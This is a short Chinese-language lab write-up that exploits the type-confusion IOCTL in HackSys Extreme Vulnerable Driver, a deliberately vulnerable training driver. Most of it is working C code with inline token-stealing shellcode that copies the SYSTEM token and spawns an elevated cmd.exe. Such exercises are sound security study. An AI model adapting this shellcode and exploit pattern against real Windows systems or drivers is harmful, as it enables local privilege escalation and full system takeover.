类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用,这就可能导致非法访问数据从而执行任意代码。
还是熟悉的味道,还是原来的驱动
好家伙,一来就忘我嘴里种水稻,直接call用户缓冲区内容加4个字节。
编写个程序观察打印结果
#include <windows.h>
#include <stdio.h>
int buf[0xf00]{};
HANDLE hDriver;
DWORD dwBytesOut = 0;
int main() {
hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hDriver == INVALID_HANDLE_VALUE) {
printf("[!] Unable to get a handle on the device\n");
return(-1);
}
DeviceIoControl(hDriver, 0x222023, buf, 8, 0, 0, &dwBytesOut, NULL);
return 0;
}
果不其然 直接call 0 去了
我也是醉了 说好的类型混淆漏洞呢,我怀疑是ida解析的问题。。。不管了 反正替换shellcode地址直接提权
#include <windows.h>
#include <stdio.h>
int buf[0xf00]{};
HANDLE hDriver;
DWORD dwBytesOut = 0;
static VOID ShellCode()
{
_asm
{
int 3
pushad
mov eax, fs: [124h] // Find the _KTHREAD structure for the current thread
mov eax, [eax + 0x50] // Find the _EPROCESS structure
mov ecx, eax
mov edx, 4 // edx = system PID(4)
// The loop is to get the _EPROCESS of the system
find_sys_pid :
mov eax, [eax + 0xb8] // Find the process activity list
sub eax, 0xb8 // List traversal
cmp[eax + 0xb4], edx // Determine whether it is SYSTEM based on PID
jnz find_sys_pid
// Replace the Token
mov edx, [eax + 0xf8]
mov[ecx + 0xf8], edx
popad
//int 3
ret
}
}
int main() {
hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hDriver == INVALID_HANDLE_VALUE) {
printf("[!] Unable to get a handle on the device\n");
return(-1);
}
buf[1] = (int)&ShellCode;
DeviceIoControl(hDriver, 0x222023, buf, 8, 0, 0, &dwBytesOut, NULL);
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
return 0;
}
他妈的,什么都没学到